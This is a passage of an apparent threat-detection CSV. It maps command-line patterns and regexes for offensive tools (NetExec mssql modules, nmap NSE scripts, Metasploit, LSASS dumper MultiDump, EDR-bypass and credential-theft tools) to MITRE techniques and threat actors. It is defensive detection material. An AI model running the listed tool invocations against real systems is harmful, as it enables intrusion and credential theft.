"* mremoteng.py*",".{0,1000}\smremoteng\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2187"
"* mrinfo.nse*",".{0,1000}\smrinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2188"
"* MS15-034.nse*",".{0,1000}\sMS15\-034\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","N/A","10","968","369","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z","2190"
"* ms17010 -i *",".{0,1000}\sms17010\s\-i\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","N/A","10","10","279","48","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z","2191"
"* ms17010 -n *",".{0,1000}\sms17010\s\-n\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","N/A","10","10","279","48","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z","2192"
"* msfdb run  *",".{0,1000}\smsfdb\srun\s\s.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","2193"
"* --msfoptions *",".{0,1000}\s\-\-msfoptions\s.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","2194"
"* --msf-path*",".{0,1000}\s\-\-msf\-path.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","2195"
"* msfremove.ps1*",".{0,1000}\smsfremove\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","2196"
"* msfstaged.exe*",".{0,1000}\smsfstaged\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","2197"
"* msfupdate.ps1*",".{0,1000}\smsfupdate\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","2198"
"* msfvenom.bat*",".{0,1000}\smsfvenom\.bat.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","2199"
"* msfws.py *",".{0,1000}\smsfws\.py\s.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","0","N/A","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","2200"
"* Mshikaki.cpp*",".{0,1000}\sMshikaki\.cpp.{0,1000}","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tool","https://github.com/trevorsaudi/Mshikaki","1","0","N/A","N/A","9","2","135","25","2023-11-26T18:13:40Z","2023-09-03T16:35:50Z","2201"
"* msrpc-enum.nse*",".{0,1000}\smsrpc\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2202"
"* mssprinkler.ps1*",".{0,1000}\smssprinkler\.ps1.{0,1000}","offensive_tool_keyword","MSSprinkler","password spraying utility for organizations to test their M365 accounts from an external perspective. It employs a 'low-and-slow' approach","T1110.003 - T1110.001","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/TheresAFewConors/MSSprinkler","1","0","N/A","N/A","9","1","74","7","2025-02-25T13:32:41Z","2024-09-15T09:54:53Z","2203"
"* mssql * -u * -p * -M met_inject*",".{0,1000}\smssql\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\smet_inject.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2204"
"* mssql * -u * -p * -M mssql_priv*",".{0,1000}\smssql\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\smssql_priv.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2205"
"* mssql * -u * -p * -M web_delivery *",".{0,1000}\smssql\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\sweb_delivery\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2206"
"* ms-sql-brute.nse*",".{0,1000}\sms\-sql\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2207"
"* ms-sql-config.nse*",".{0,1000}\sms\-sql\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2208"
"* ms-sql-dac.nse*",".{0,1000}\sms\-sql\-dac\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2209"
"* ms-sql-dump-hashes.nse*",".{0,1000}\sms\-sql\-dump\-hashes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2210"
"* ms-sql-empty-password.nse*",".{0,1000}\sms\-sql\-empty\-password\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2211"
"* ms-sql-hasdbaccess.nse*",".{0,1000}\sms\-sql\-hasdbaccess\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2212"
"* ms-sql-info.nse*",".{0,1000}\sms\-sql\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2213"
"* ms-sql-ntlm-info.nse*",".{0,1000}\sms\-sql\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2214"
"* ms-sql-query.nse*",".{0,1000}\sms\-sql\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2215"
"* ms-sql-tables.nse*",".{0,1000}\sms\-sql\-tables\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2216"
"* ms-sql-xp-cmdshell.nse*",".{0,1000}\sms\-sql\-xp\-cmdshell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2217"
"* --mstsc-poison-hkcr*",".{0,1000}\s\-\-mstsc\-poison\-hkcr.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","2218"
"* mtrace.nse*",".{0,1000}\smtrace\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2219"
"* MultiDump.exe*",".{0,1000}\sMultiDump\.exe.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","2220"
"* murmur-version.nse*",".{0,1000}\smurmur\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2221"
"* MutationGate.cpp*",".{0,1000}\sMutationGate\.cpp.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","0","N/A","N/A","8","3","251","34","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z","2222"
"* mysql-audit.nse*",".{0,1000}\smysql\-audit\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2223"
"* mysql-brute.nse*",".{0,1000}\smysql\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2224"
"* mysql-databases.nse*",".{0,1000}\smysql\-databases\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2225"
"* mysql-dump-hashes.nse*",".{0,1000}\smysql\-dump\-hashes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2226"
"* mysql-empty-password.nse*",".{0,1000}\smysql\-empty\-password\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2227"
"* mysql-enum.nse*",".{0,1000}\smysql\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2228"
"* mysql-info.nse*",".{0,1000}\smysql\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2229"
"* mysql-query.nse*",".{0,1000}\smysql\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2230"
"* mysql-users.nse*",".{0,1000}\smysql\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2231"
